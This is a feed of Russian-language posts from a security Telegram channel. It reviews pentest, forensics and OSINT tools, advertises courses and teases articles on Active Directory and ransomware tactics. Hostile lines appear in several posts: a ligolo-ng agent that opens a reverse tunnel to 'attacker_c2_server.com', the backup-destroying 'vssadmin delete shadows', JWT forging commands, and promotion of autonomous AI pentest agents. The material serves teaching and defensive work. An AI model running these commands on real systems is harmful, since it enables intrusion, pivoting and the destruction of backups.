MESH — это open source-инструмент для удалённой форензики мобильных устройств и сетевого мониторинга через зашифрованную peer-to-peer сеть. Он позволяет анализировать устройства (Android / iOS), даже если к ним нет прямого доступа.
Вместо VPN и централизованных серверов используется overlay mesh-сеть:
В основе — модифицированный протокол Tailscale с self-hosted control plane и разделением управления и трафика.*Ephemeral-сети — это временные сети, которые создаются под конкретную задачу
MESH создаёт распределённую сеть из трёх компонентов:
При этом:
Это позволяет:
git clone https://github.com/BARGHEST-ngo/MESH.git
cd mesh/control-plane
docker-compose up -d
https://localhost:3000/login
docker exec headscale headscale apikeys create --expiration 90d
После этого можно подключать устройства и начинать форензику.
#mesh #p2p #forensics #mobile #privacy #security #blueteam #dfir #threatintel
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13👍8🔥8🤔2🌚1
Простой, легкий и быстрый инструмент, который позволяет пентестерам создавать туннели на основе обратного TCP/TLS-соединения с использованием интерфейса tun (без необходимости в SOCKS). Поддерживаются протоколы TCP, UDP, ICMP.
Пакеты, отправляемые в TUN-интерфейс при запуске прокси-сервера, транслируются и затем передаются в удалённую сеть агента.
Например, для TCP-соединения процесс работает следующим образом:
Такой механизм позволяет использовать инструменты, например Nmap, без необходимости использования proxychains.
Можно произвести установку из репозитория Kali Linux :
apt install ligolo-ng. Или собрать через go:
go build -o agent cmd/agent/main.go
go build -o proxy cmd/proxy/main.go
При использовании в Linux необходимо создать интерфейс tun на прокси-сервере:
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
Далее необходимо запустить прокси-сервер на своем сервере (порт по умолчанию 11601):
./proxy -autocert
./proxy -selfcert
После этого запускается агент на целевой системе:
./agent -connect attacker_c2_server.com:11601
После подключения агента на прокси-сервере появится новая сессия:
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000
Через команду
session необходимо выбрать нужного агента и далее запустить туннелирование на прокси-сервере, используя имя интерфейса.#tools #tun #pentest #network
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍8🔥6
Друзья, напоминаем, на каких курсах начинается обучение в апреле! 🚗
Старт 6 апреля:
🙂 🙃 😄 🥲 🙂 ☺️ 😀 ⤵️
✨ Курс «Профессия аналитик центра мониторинга безопасности (SOC)» — запускаем новый курс. Это возможность войти в профессию с нуля: на курсе освоите работу с инцидентами ИБ, научитесь выявлять атаки и анализировать события.
Старт 16 апреля:
✨ Курс «Тестирование Веб-приложений на проникновение (WAPT)» — отработаем полный цикл тестирования: от разведки до пост-эксплуатации.
Старт 20 апреля:
✨ Курс «OSINT: технология боевой разведки» — освоим профессиональный поиск информации и анализ данных из открытых источников.
Старт 27 апреля:
✨ Курс «Профессия DevSecOps - инженер: безопасная разработка» — освоим DevSecOps-инженерию: от автоматизации безопасности до работы с Kubernetes и Terraform.
✨ Курс «Цифровая криминалистика и реагирование на инциденты ОС Linux (DFIR)» — ищем и анализируем следы кибервзломов (анализ артефактов, работа с opensource инструментами).
🪧 Запишитесь у нашего менеджера @CodebyAcademyBot
Или узнайте подробности и программы курсов — на нашем➡️ сайте
Старт 6 апреля:
Старт 16 апреля:
Старт 20 апреля:
Старт 27 апреля:
Или узнайте подробности и программы курсов — на нашем
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍6✍3🔥2
Forwarded from Hacker Lab
🚩 Новые задания на платформе HackerLab!
👩💻 Категория Pentest Machines — Грузоперевозки
Приятного хакинга!
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍5🔥3
Forwarded from Hacker Lab
В HackerLab запускается сертификация. На текущий момент сертификат доступен участникам, успешно завершившим курс SQL Injection Master и сдавшим итоговый экзамен.
Экзамен представляет собой практическую эксплуатацию уязвимостей в изолированной инфраструктуре. Вы не отвечаете на вопросы - вы атакуете систему, находите уязвимости и шаг за шагом развиваете атаку.
Это не просто «галочка», а результат, подтверждённый практикой.
PRO20
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16🔥9❤4👎2🎉2😎1
Zero-click через стикер: 9.8 и молчание Telegram
Получил стикер — устройство скомпрометировано. Без клика, без уведомления. Именно это описывает ZDI-CAN-30207 — и именно это Telegram отрицает.
🔍 Оценка CVSS 9.8 — не маркетинг. Математика за ней конкретна: метрика
⚙️ Аналог по вектору — CVE-2019-3568, buffer overflow в WhatsApp VoIP: идентичный CVSS, идентичная схема. Статус ZDI-CAN-30207 сейчас — disputed: ZDI верифицировал, вендор отрицает. Разбираем CVSS-математику, хронологию disclosure и методы инструментирования клиента для мониторинга.
Полный разбор:
https://codeby.net/threads/zero-day-v-telegram-zdi-can-30207-razbor-uyazvimosti-telegram-zero-day-s-otsenkoi-cvss-9-8.92557/
Получил стикер — устройство скомпрометировано. Без клика, без уведомления. Именно это описывает ZDI-CAN-30207 — и именно это Telegram отрицает.
🔍 Оценка CVSS 9.8 — не маркетинг. Математика за ней конкретна: метрика
UI:N (zero-click) даёт коэффициент 0.85 вместо 0.62 при клике. Разница — 9.8 против 8.1. Оба сценария критичны, но zero-click означает массовую эксплуатацию без единого действия жертвы.⚙️ Аналог по вектору — CVE-2019-3568, buffer overflow в WhatsApp VoIP: идентичный CVSS, идентичная схема. Статус ZDI-CAN-30207 сейчас — disputed: ZDI верифицировал, вендор отрицает. Разбираем CVSS-математику, хронологию disclosure и методы инструментирования клиента для мониторинга.
Полный разбор:
https://codeby.net/threads/zero-day-v-telegram-zdi-can-30207-razbor-uyazvimosti-telegram-zero-day-s-otsenkoi-cvss-9-8.92557/
❤6❤🔥1
Бэкап — цель номер один 🎯
Шифровальщик отработал за 47 минут. Когда команда полезла восстанавливаться — репозиторий Veeam зашифрован, каталог tape-библиотеки удалён, VSS-снимки стёрты за двое суток до запуска payload.
Это не баг шифровальщика — это Recovery Denial: атакующие методично уничтожают бэкапы до старта шифрования. По данным Mandiant M-Trends 2025, уничтожение возможностей восстановления — одна из самых частых тактик ransomware-группировок. Бэкап — не страховка, а первая мишень. 🔥
Что делают атакующие в первую очередь:
•
• Останавливают службы Veeam и удаляют SQL-каталог
• Ищут Veeam-серверы через AD и ломятся по доменным учёткам.
Подробный разбор:
https://codeby.net/threads/recovery-denial-zashchita-rezervnykh-kopii-ot-ransomware-taktiki-atakuyushchikh-i-metody-protivodeistviya.92571/
Шифровальщик отработал за 47 минут. Когда команда полезла восстанавливаться — репозиторий Veeam зашифрован, каталог tape-библиотеки удалён, VSS-снимки стёрты за двое суток до запуска payload.
Это не баг шифровальщика — это Recovery Denial: атакующие методично уничтожают бэкапы до старта шифрования. По данным Mandiant M-Trends 2025, уничтожение возможностей восстановления — одна из самых частых тактик ransomware-группировок. Бэкап — не страховка, а первая мишень. 🔥
Что делают атакующие в первую очередь:
•
vssadmin delete shadows — VSS за дни до шифрования• Останавливают службы Veeam и удаляют SQL-каталог
• Ищут Veeam-серверы через AD и ломятся по доменным учёткам.
Подробный разбор:
https://codeby.net/threads/recovery-denial-zashchita-rezervnykh-kopii-ot-ransomware-taktiki-atakuyushchikh-i-metody-protivodeistviya.92571/
❤5👎1🔥1😁1👀1
PacketSender: Утилита для отправки и приема сетевых пакетов
🎇 Основные функции
- Поддержка протоколов (TCP, UDP, SSL (TLS), HTTP/HTTPS)
- Режимы работы - клиент (отправка) и сервер (прослушивание)
- Генератор интенсивного трафика (нагрузочное тестирование с настраиваемой скоростью)
- Поддержка макросов (подстановка даты, времени, счетчика и случайных значений)
- Панели управления - создание кнопочных панелей для быстрого выполнения команд
⬇️ Установка
Проверка
1️⃣ Примеры использования CLI
⏺️ Отправка UDP
⏺️ Режим сервера (прослушивание TCP)
⏺️ Генератор интенсивного трафика (20 Гц)
⏺️ Отладка сетевого сервера
⏺️ Проверка SSL/TLS соединения
⏺️ Нагрузочное тестирование
2️⃣ Использование графического интерфейса (GUI). Основные элементы:
▶️ Поля ввода (имя пакета, данные (ASCII/HEX), адрес, порт)
▶️ Выбор протокола (TCP, UDP, SSL, HTTP GET, HTTP POST)
▶️ Таблица сохраненных пакетов - двойной клик для редактирования
▶️ Кнопка отправки - выполнение выбранного пакета
▶️ Лог трафика (отображение отправленных и полученных данных)
▶️ Индикаторы серверов (UDP, TCP, SSL серверы с отображением портов)
#PacketSender #NetworkTesting #TCP #UDP #pentest #tool
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
PacketSender — это кроссплатформенное приложение с открытым исходным кодом, предназначенное для отправки и приема TCP, UDP, SSL-пакетов, а также HTTP/HTTPS-запросов. Инструмент предоставляет графический интерфейс и возможности командной строки, позволяя тестировать сетевое взаимодействие, отлаживать серверные приложения и выполнять диагностику сетевых протоколов.
- Поддержка протоколов (TCP, UDP, SSL (TLS), HTTP/HTTPS)
- Режимы работы - клиент (отправка) и сервер (прослушивание)
- Генератор интенсивного трафика (нагрузочное тестирование с настраиваемой скоростью)
- Поддержка макросов (подстановка даты, времени, счетчика и случайных значений)
- Панели управления - создание кнопочных панелей для быстрого выполнения команд
sudo apt install packetsender
Проверка
packetsender —h
packetsender -u 192.168.1.100 8080 "Hello UDP"
packetsender -l -t -b 8080
packetsender --rate 20 --name "Test Packet"
#режим сервера для приема данных
packetsender -l -t -b 9999
#отправка тестовых данных из другого окна
packetsender -t localhost 9999 "TEST"
packetsender -s expired.packetsender.com 443 "GET / HTTP/1.0\r\n\r\n"
packetsender --bps 1000000 --num 10000 --name "Status Check"
#PacketSender #NetworkTesting #TCP #UDP #pentest #tool
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍6🔥4😁1
PentestAgent
⏺️ PentestAgent — это передовой фреймворк для автоматизированного пентеста, который использует большие языковые модели (LLM) и мультиагентную архитектуру для выполнения задач по тестированию на проникновение с минимальным участием человека. Существует две основные версии продукта: академическая (исследовательский проект) и практическая (инструмент для реального использования).
🧠 Академическая версия:
Это оригинальный проект, представленный на конференции ACM AsiaCCS группой исследователей из Северо-Западного университета, Чжэцзянского университета и Ant Group. Фреймворк построен на мультиагентной коллаборации, где каждый агент отвечает за свой этап пентеста в соответствии со стандартом PTES (Penetration Testing Execution Standard): Reconnaissance Agent, Search Agent, Planning Agent и Execution Agent
Исследователи создали бенчмарк на основе 67 целей из VulHub и HackTheBox (различные CWE и уровни сложности). Результаты при использовании GPT-4 :
➡️ Общая успешность: 74.2% (у GPT-3.5 — 60.6%)
➡️ Простые задачи: 100% завершения на этапах разведки и анализа
➡️ Сложные задачи: успешность снижается до 50% на этапе разведки
Сравнение с PentestGPT показало значительное преимущество в скорости: этап разведки занял 220 секунд против 1199 секунд.
🔑 Практическая версия:
Параллельно с академическим проектом существует активно развивающийся open-source инструмент от сообщества GH05TCREW на GitHub.
❗️ Требования: Python 3.10+, API ключ OpenAI, Anthropic или другого провайдера (поддерживается LiteLLM)
⛓️💥 Запуск:
Режим работы:
⏺️ /assist - Единичный запрос с выполнением инструментов
⏺️ /agent - Автономное выполнение одной задачи
⏺️ /crew - Мультиагентный режим
⏺️ /interact - Интерактивный режим с подсказками
❓ Как считаете, способен данный продукт полностью автоматизировать пентест?
#pentestagemt #ai #pentest #python #openai
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Это оригинальный проект, представленный на конференции ACM AsiaCCS группой исследователей из Северо-Западного университета, Чжэцзянского университета и Ant Group. Фреймворк построен на мультиагентной коллаборации, где каждый агент отвечает за свой этап пентеста в соответствии со стандартом PTES (Penetration Testing Execution Standard): Reconnaissance Agent, Search Agent, Planning Agent и Execution Agent
Исследователи создали бенчмарк на основе 67 целей из VulHub и HackTheBox (различные CWE и уровни сложности). Результаты при использовании GPT-4 :
Сравнение с PentestGPT показало значительное преимущество в скорости: этап разведки занял 220 секунд против 1199 секунд.
Параллельно с академическим проектом существует активно развивающийся open-source инструмент от сообщества GH05TCREW на GitHub.
git clone https://github.com/GH05TCREW/pentestagent.git
cd pentestagent
./scripts/setup.sh
pentestagent -t 192.168.1.1
Режим работы:
#pentestagemt #ai #pentest #python #openai
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7🔥4👍3😁2
JWT_TOOL
📐 Функциональность:
📉 Проверка действительности токена
📉 Проверка на наличие уязвимостей - (CVE-2015-2951, CVE-2016-10555, CVE-2018-0114 и т.д)
📉 Проверка на наличие некорректных настроек или известных уязвимостей.
📉 Выявление слабых ключей с помощью высокоскоростной словарной атаки
🖱 Генерация и восстановление ключей RSA и ECDSA (из файлов JWKS)
⬇️ Установка:
0️⃣ Клонирование репозитория:
1️⃣ Переход в рабочую директорию:
⛓️💥 Запуск:
➡️ Разведка:
➡️ Сканирование:
➡️ Эксплуатация:
➡️ Фаззинг (более глубокий анализ):
#web #jwt
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
jwt_tool - это набор инструментов для проверки, подделки, сканирования и изменения JWT (JSON Web Tokens).
git clone https://github.com/ticarpi/jwt_tool.git
cd jwt_tool/
python3 jwt_tool.py <JWT_TOKEN>
python3 jwt_tool.py -t <URL> -rc "jwt=<JWT_TOKEN>;anothercookie=hack" -M pb
python3 jwt_tool.py -t <URL> -rc "jwt=<JWT_TOKEN>;anothercookie=hack" -X i -I -pc name -pv admin
python3 jwt_tool.py -t <URL> -rc "jwt=<JWT_TOKEN>;anothercookie=hack" -I -hc kid -hv custom_sqli_vectors.txt
#web #jwt
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8👍5🔥4
использует различия на уровне реализации в популярных реализациях WebSocket, чтобы попытаться идентифицировать запущенные серверы WebSocket. STEWS использует функции сервера как в процессе установления соединения WebSocket (с использованием протокола HTTP), так и в рамках протокола WebSocket (с использованием протокола WebSocket).
Что такое WebSockets
WebSocket обеспечивает постоянное соединение между клиентом и сервером. Данные передаются в обе стороны без задержек - сообщения в чате приходят сразу, а игровые действия синхронизируются в реальном времени. Появление WebSocket стало прорывом для сервисов, где важна мгновенная реакция.
Использование
python3 STEWS-vuln-detect.py -4 -n -u 127.0.0.1:8084
python3 STEWS-fingerprint.py -1 -k -u streamer.finance.yahoo.com
STEWS-discovery.sh
#tools #websockets #network
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7🔥7👍5
Qu1cksc0pe: Многофункциональный инструмент для статического и динамического анализа вредоносного ПО
🧿 Поддерживаемые форматы файлов
- Windows (.exe, .dll, .msi, .bin)
- Linux (.elf, .bin)
- macOS (mach-o)
- Android (.apk, .jar, .dex)
- Документы (.doc, .docm, .docx, .xls, .xlsx, .pdf, .rtf, .one)
- Скрипты (VBScript/VBA (.vbs, .vbe, .vba), PowerShell)
- Архивы (.zip, .rar)
⬇️ Установка
Проверка
⏺️ Базовый анализ
⏺️ Быстрый анализ подозрительного EXE-файла
⏺️ Глубокий анализ документа с извлечением макросов
⏺️ Проверка APK на наличие вредоносного поведения
⏺️ Пакетное сканирование коллекции образцов
⏺️ Извлечение индикаторов компрометации
#Qu1cksc0pe #StaticAnalysis #DynamicAnalysis #tool #pentest #MITRE
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Qu1cksc0pe — это универсальная платформа с открытым исходным кодом для статического и динамического анализа вредоносного программного обеспечения. Инструмент предназначен для исследования широкого спектра файлов: от исполняемых binaries Windows, Linux и macOS до документов, APK-файлов, архивов и сценариев PowerShell. Основная цель — предоставить исследователям безопасности максимальный объем информации о подозрительных файлах, помогая понять их функциональность и потенциальные угрозы.
- Windows (.exe, .dll, .msi, .bin)
- Linux (.elf, .bin)
- macOS (mach-o)
- Android (.apk, .jar, .dex)
- Документы (.doc, .docm, .docx, .xls, .xlsx, .pdf, .rtf, .one)
- Скрипты (VBScript/VBA (.vbs, .vbe, .vba), PowerShell)
- Архивы (.zip, .rar)
pipх install quickscope
Проверка
quickscope -h
python quickscope --file suspicious_file.exe --analyze
python quickscope --file unknown_sample.exe --analyze --vtFile
python quickscope --file invoice.doc --docs
#cтатический анализ
python quickscope --file malicious.apk --analyze
#динамический анализ (с подключенным устройством)
python quickscope --file malicious.apk --watch
python quickscope --folder ./malware_collection --hashscan
python quickscope --file suspicious_sample.exe --analyze --report | jq '.iocs'
#Qu1cksc0pe #StaticAnalysis #DynamicAnalysis #tool #pentest #MITRE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍7❤5
От доменного пользователя до Domain Admin за 15 минут
🔍 Не хвастовство — воспроизводимая цепочка. Типовые мисконфиги до сих пор живут в продакшене, и путь наверх часто короче, чем кажется.
⚔️ Полный цикл AD exploitation — от
• BloodHound строит граф атаки: три-четыре промежуточных объекта до Domain Admin, которые руками не найти
• Kerberoasting и AS-REP Roasting — с настройкой уязвимой лабы на PowerShell
• В
📖 Команды, флаги, разбор ошибок — полный гайд:
https://codeby.net/threads/pentest-active-directory-polnyi-gaid-ot-razvedki-do-domain-admin-v-2026.92603/
🔍 Не хвастовство — воспроизводимая цепочка. Типовые мисконфиги до сих пор живут в продакшене, и путь наверх часто короче, чем кажется.
⚔️ Полный цикл AD exploitation — от
nmap-скана до DCSync — с командами и разбором флагов:• BloodHound строит граф атаки: три-четыре промежуточных объекта до Domain Admin, которые руками не найти
• Kerberoasting и AS-REP Roasting — с настройкой уязвимой лабы на PowerShell
• В
SYSVOL до сих пор лежат GPP-пароли: ключ шифрования Microsoft сама опубликовала📖 Команды, флаги, разбор ошибок — полный гайд:
https://codeby.net/threads/pentest-active-directory-polnyi-gaid-ot-razvedki-do-domain-admin-v-2026.92603/
👍9❤3🔥3🗿2
Набор инструментов для создания полезной нагрузки. В инструменте реализован модульный подход, позволяющий добавлять новые функции с минимальными затратами времени на изучение структуры инструмента.
Возможности
Sickle упрощает процесс, автоматически оборачивая шелл-код для быстрого тестирования, а модуль run в настоящее время поддерживает как Windows, так и Unix
sickle-pdk -m diff -r calc.exe BINFILE=calc2.exe MODE=htxdump
sickle-pdk -m run -r shellcode.bin
sickle-pdk -r generic_sc -m disassemble
sickle-pdk -r generic_sc -f rust
#tools #payload #assemler
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍5🔥5
Один граф — и весь домен как на ладони
🔍 Получил учётку рядового пользователя в домене? У тебя есть минуты, чтобы найти путь до Domain Admin — пока SOC не среагировал.
BloodHound превращает тысячи объектов Active Directory в читаемый граф атак. Никакой магии — только математика на графах.
⚡ Что внутри:
1.
2.
3. Cypher-запросы под нестандартные сценарии — когда стандартных путей нет
🎯 ACL-права типа GenericAll или WriteDACL на нужном объекте — это уже готовый вектор атаки, который большинство команд защиты не видит в упор.
Полный разбор от запуска коллектора до эксплуатации ACL:
https://codeby.net/threads/bloodhound-active-directory-razvedka-domena-postroyeniye-grafa-atak-i-ekspluatatsiya-acl.92606/
🔍 Получил учётку рядового пользователя в домене? У тебя есть минуты, чтобы найти путь до Domain Admin — пока SOC не среагировал.
BloodHound превращает тысячи объектов Active Directory в читаемый граф атак. Никакой магии — только математика на графах.
⚡ Что внутри:
1.
SharpHound.exe -c DCOnly — минимум шума, максимум данных с контроллера2.
bloodhound-python — сбор с Linux без файлов на цели3. Cypher-запросы под нестандартные сценарии — когда стандартных путей нет
🎯 ACL-права типа GenericAll или WriteDACL на нужном объекте — это уже готовый вектор атаки, который большинство команд защиты не видит в упор.
Полный разбор от запуска коллектора до эксплуатации ACL:
https://codeby.net/threads/bloodhound-active-directory-razvedka-domena-postroyeniye-grafa-atak-i-ekspluatatsiya-acl.92606/
❤7👍3🔥3
Exploiting Native AD Techniques for Security
Проект предоставляет обширную коллекцию методов, команд и функций
Некоторые примеры:
# Collect Domain SID
Get-ADDomain | Select-Object SID
# Users with Delegation Privileges
Get-ADUser -Filter {TrustedForDelegation -eq $true}
# Get Domain Users Last Logon Time
Get-ADUser -Filter * -Properties LastLogonDate | Select Name, LastLogonDate
# List Users in Specific Group
Get-ADGroupMember -Identity "Domain Admins" | Select-Object Name, SamAccountName
# List Service Principal Names (SPNs)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Select-Object Name, ServicePrincipalName
# Check for Kerberos Pre-Authentication Disabled Accounts
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Select Name, SamAccountName
#lolad #redteam #ad #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤5👍3🙊1
Какой сертификат пентестера реально стоит денег?
CEH стоит в вакансиях рядом с OSCP — но это как сравнивать вождение в симуляторе с реальной трассой. Один экзамен проверяет умение ткнуть в правильный вариант из четырёх, другой — взломать машину и написать отчёт за 48 часов.
🔐 Автор лично сдал OSCP и eJPT, готовился к PNPT и видел CEH у коллег. Вот его вывод:
• OSCP — минимальный порог для консалтинга и red team. Без него резюме часто не открывают.
• CEH — нужен для госсектора и compliance, а не для реального взлома.
• eJPT/PNPT — старт для тех, кто ещё не готов к OSCP, но хочет практики.
⚡ В OSCP+ 2025 убрали бонусные баллы за курс — теперь всё решает только экзамен. Жёстче, но честнее.
Полный разбор форматов, цен и рекомендаций:
https://codeby.net/threads/sertifikatsiya-po-pentestu-oscp-vs-ceh-vs-ejpt-vs-pnpt-chestnoye-sravneniye-ot-praktika.92610/
CEH стоит в вакансиях рядом с OSCP — но это как сравнивать вождение в симуляторе с реальной трассой. Один экзамен проверяет умение ткнуть в правильный вариант из четырёх, другой — взломать машину и написать отчёт за 48 часов.
🔐 Автор лично сдал OSCP и eJPT, готовился к PNPT и видел CEH у коллег. Вот его вывод:
• OSCP — минимальный порог для консалтинга и red team. Без него резюме часто не открывают.
• CEH — нужен для госсектора и compliance, а не для реального взлома.
• eJPT/PNPT — старт для тех, кто ещё не готов к OSCP, но хочет практики.
⚡ В OSCP+ 2025 убрали бонусные баллы за курс — теперь всё решает только экзамен. Жёстче, но честнее.
Полный разбор форматов, цен и рекомендаций:
https://codeby.net/threads/sertifikatsiya-po-pentestu-oscp-vs-ceh-vs-ejpt-vs-pnpt-chestnoye-sravneniye-ot-praktika.92610/
🔥17👍7❤3
Усовершенствованный сканер уязвимостей на основе искусственного интеллекта и инструмент для тестирования на проникновение, который объединяет в себе различные ИИ-сервисы (OpenAI, Grok, OLLAMA, Claude) с комплексными модулями тестирования для автоматического поиска уязвимостей, интеллектуальной генерацией полезной нагрузки и составления профессиональных отчетов.
git clone https://github.com/zakirkun/deep-eye.git
cd deep-eye
pip install -r requirements.txt
# Редактируйте config.yaml в соответствии с вашими API-ключами
cp config/config.example.yaml config/config.yaml
Все опции сканирования настраиваются в файле config/config.yaml:
python deep_eye.py -u https://example.com
python deep_eye.py -u https://testsite.com --recon --full-scan --format pdf -o full_report.pdf
python deep_eye.py -u https://testsite.com --ai-provider claude --proxy http://127.0.0.1:8080
#tools #scanner #pentesting
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥7👍6❤4🔥3👏2
WebSift
📐 Функции
📉 Собирает адреса электронной почты с заданного веб-сайта.
📉 Извлекает номера телефонов в стандартных форматах.
📉 Собирает ссылки на социальные сети и другие URL-адреса с веб-сайтов для расширения возможностей OSINT.
🖱 Сохраняет извлеченную информацию для дальнейшего анализа.
⬇️ Установка:
🔗 Клонируем репозиторий и переходим в рабочую директорию:
⛓️💥 Запуск:
#web #pentest #OSINT
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
WebSift — это мощный инструмент для этичного хакинга и OSINT, предназначенный для извлечения адресов электронной почты, номеров телефонов, ссылок на социальные сети и другие ссылки с веб-сайтов. Он разработан для систем на базе Termux и Linux. Этот инструмент идеально подходит для специалистов по безопасности и исследователей, которым необходимо собирать общедоступную информацию в этических и правовых целях.
git clone https://github.com/s-r-e-e-r-a-j/WebSift.git
cd WebSift/
cd WebSift/
bash websift.sh
#web #pentest #OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍6🔥4
🔍 80% успешных атак рождаются до запуска эксплойта
Эксплойт — вишенка. Разведка — весь торт. Пять лет пентестов подтверждают: кто криво просканировал периметр — дальше можно не продолжать.
🛠 Цепочка из четырёх инструментов для полного цикла разведки:
1. masscan — прочёсывает /16-подсети за минуты, но с
2. nmap — верифицирует результаты и вытаскивает версии сервисов (masscan даёт ложноположительные)
3. tcpdump — перехватывает NTLM-хэши и пароли в открытом трафике пассивно
4. netcat — баннеры, проверка портов, простые туннели
💡 Каждый шаг привязан к технике MITRE ATT&CK — это сразу поднимает уровень отчёта. Заказчик видит не «открытый порт», а «Network Service Discovery (T1046)» с критичностью и вектором.
Полный разбор с командами, типичными ошибками джуниоров и готовыми сценариями:
https://codeby.net/threads/setevaya-razvedka-iz-linux-nmap-masscan-netcat-i-tcpdump-prakticheskiye-stsenarii-dlya-pentesta.92622/
Эксплойт — вишенка. Разведка — весь торт. Пять лет пентестов подтверждают: кто криво просканировал периметр — дальше можно не продолжать.
🛠 Цепочка из четырёх инструментов для полного цикла разведки:
1. masscan — прочёсывает /16-подсети за минуты, но с
--rate=1000 — иначе положишь клиентскую сеть2. nmap — верифицирует результаты и вытаскивает версии сервисов (masscan даёт ложноположительные)
3. tcpdump — перехватывает NTLM-хэши и пароли в открытом трафике пассивно
4. netcat — баннеры, проверка портов, простые туннели
💡 Каждый шаг привязан к технике MITRE ATT&CK — это сразу поднимает уровень отчёта. Заказчик видит не «открытый порт», а «Network Service Discovery (T1046)» с критичностью и вектором.
Полный разбор с командами, типичными ошибками джуниоров и готовыми сценариями:
https://codeby.net/threads/setevaya-razvedka-iz-linux-nmap-masscan-netcat-i-tcpdump-prakticheskiye-stsenarii-dlya-pentesta.92622/
👍14❤8🔥6👎1